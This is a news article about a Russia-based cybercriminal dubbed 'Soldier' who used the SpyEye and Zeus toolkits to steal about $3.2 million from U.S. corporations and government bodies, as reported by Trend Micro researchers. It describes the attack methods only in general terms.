Dubbed Soldier in the underground realm of the cyberworld, a hacker situated in Russia has managed to siphon over $3.2 million over a period of six months from major U.S. corporations, including the U.S. government and military.
He’s a mid-level criminal, not some super-genius.
David Perry, global director of education, Trend Micro Inc.
Researchers at Tokyo-based security vendor Trend Micro Inc. discovered the cybercriminal activity and found that not only was the U.S. affected, but a total of 25,000 systems were infected across a span of more than 90 countries, including the U.K., Brazil, Mexico, Thailand, Turkey, Saudi Arabia, India, Romania and Canada.
The cybercriminal, believed to be in his early 20s, has used SpyEye and Zeus attack toolkits to his advantage to accomplish these attacks, along with money mules and two accomplices believed to be situated in California. To increase the number of successful infections in the U.S. , the attacker is believed to have paid for U.S. traffic from other cybercriminals.
By using the SpyEye and Zeus toolkits, Soldier was able to not only accomplish automated online banking fraud, but also able to steal credentials from sites such as Facebook, Yahoo, Google, eBay, Amazon, Twitter, PayPal and Skype. His attack technique is becoming increasingly common and a growing problem for enterprises.
“This guy did not create this software, he bought it,” said Trend Micro’s global director of education David Perry. “This is commercially available crime. This is a very modern thing. He’s a mid-level criminal, not some super-genius.”
In August, McAfee uncovered a similar attack that infiltrated enterprise and government networks. Operation Shady Rat exposed a command-and-control server containing the data of more than 70 U.S. government agencies, contractors, enterprises and other nations that were compromised over a five-year period. Those attacks involved a standard spear phishing email message attempting to get users to click on a malicious link or get tricked into giving up account credentials.
In the Trend Micro discovery, the attacker conducted most of the attacks by planting malicious code using SQL injection. Other than the drive-by downloads, he also used several other tactics including infecting network shares, USB sticks and mobile devices.
Many of the 25,000 affected people worked for very large corporations. According to Perry, many victims’ systems became infected at their residence and then went into the office with the infection. “They opened a window of vulnerabilities,” Perry said.
Trend researchers have been investigating the hacker since April and have notified authorities. The attack has been ongoing since January 2011. Researchers checked the IP addresses that were recorded in the SpyEye command-and-control server and discovered that “a wide variety of large organizations and U.S. multinational corporations in a variety of sectors were represented in the victim population,” wrote Trend Micro’s Loucif Kharouni, senior threat researcher, in a blog post.
The organizations are all Fortune 1000 companies and included U.S. government, military, educational and research institutions, banks, airports and automobile, media and technology companies.
Perry said he could not name the individual companies due to the investigation. He added that just because all the attack websites have been shut down, that’s not going to stop the attacker from infecting more companies.
“This is the template for a lot of future crime,” said Perry said. “This is a milestone, not a big breaking news story. It’s important as a user of the Internet that you realize it’s having a profound effect on privacy. It’s like the American Revolution in the amount of repercussions. We need to pay attention to how it affects personal privacy, safety and security.”